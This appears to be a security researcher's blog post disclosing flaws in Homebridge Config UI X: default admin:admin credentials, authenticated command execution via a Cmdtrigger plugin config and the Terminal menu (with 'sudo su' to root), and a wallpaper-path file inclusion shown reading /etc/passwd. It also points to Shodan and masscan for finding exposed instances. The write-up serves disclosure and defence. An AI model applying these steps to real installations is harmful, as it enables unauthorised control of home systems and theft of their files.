homebridge-config-ui-x: default creds, authenticated cmd exec and LFI

Posted on by Andrei Agape

Homebridge Config UI X is a web based management tool for Homebridge that allows you to manage all aspects of your Homebridge setup. Around 90 instances show on on Shodan – masscan port 8081 and 8181 may reveal more.

Summary

  1. Resources
  2. Default credentials
  3. Authenticated command exec
  4. Authenticated local file inclusion

1. Resources

2. Default credentials

admin:admin

3. Authenticated command exec

3.1 Using plugins

  • install Homebridge Cmdtrigger
  • add a cmdtrigger fake switch to the config
  • restart Homebridge
  • turn on and off the cmdtrigger accessories
Install Homebridge Cmdtrigger
Add a cmdtrigger fake switch to the config
  • Both execAfterDelay true and false seems to work, but not the stateful option
{
    "bridge": {
        "name": "Homebridge 1185",
        "username": "0E:4A:23:BC:11:85",
        "port": 53750,
        "pin": "031-45-154"
    },
    "accessories": [
        {
            "accessory": "DummySwitch",
            "name": "My Stateful Switch 1",
            "stateful": true
        },
        {
            "accessory": "CmdTrigger",
            "name": "My command",
            "command": "echo 1 > /tmp/pwn",
            "delay": "10000",
            "execAfterDelay": false
        },
        {
            "accessory": "CmdTrigger",
            "name": "My command2",
            "command": "echo 1 > /tmp/pwn",
            "delay": "10000",
            "execAfterDelay": true
        }
    ],
    "platforms": []
}
Restart Homebridge to see the new switches appear in the accessories tab
Turn on and off the accessories to execute the command
/tmp # ls -l
total 2
drwxr-xr-x    2 root     root          4096 Jul  1 12:19 npm-1-6b8e747f
-rw-r--r--    1 abc      abc              4 Jul  9 19:28 pwn

3.2 Terminal menu

Some versions of the homebridge-config-ui-x (such as the Docker one) come with a Terminal menu option which allows OS command execution under the user abc inside the container. Privilege escalation to root inside the container can be done using with sudo su.

4. Authenticated LFI

  • Change wallpaper path
  • Logout and get the wallpaper background
  • Response body contains the file
Change wallpaper path
Logout and on the login page find the wallpaper background request
GET /api/auth/wallpaper/09c6ba2f480dc7cb8e09412186954bb9339fd06ee9c5e43269854813e241698c.jpg HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: mybb[lastvisit]=1589131141; mybb[lastactive]=1589131310; loginattempts=1; mybbuser=1_q8fBwS6lmddMUJSMqYlBWLJoyfMzweQXQMQuNsj9BrMfErnkzr; io=ehh4f9ksFwSkHODbAAAA
Pragma: no-cache
Cache-Control: no-cache
Response body contains the file
HTTP/1.1 200 OK
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https://raw.githubusercontent.com https://user-images.githubusercontent.com; connect-src 'self' https://openweathermap.org https://api.openweathermap.org wss://127.0.0.1:8080 ws://127.0.0.1:8080 
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer
X-XSS-Protection: 1; mode=block
vary: Origin
access-control-allow-origin: false
cache-control: public,max-age=31536000,immutable
content-type: image/jpeg
Date: Sun, 30 Aug 2020 14:52:10 GMT
Connection: close
Content-Length: 1332

root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:911:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
abc:x:1000:1000::/config:/bin/false
avahi:x:86:86:Avahi System User:/var/run/avahi-daemon:/sbin/nologin
messagebus:x:100:100:messagebus:/dev/null:/sbin/nologin

Published by Andrei Agape

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s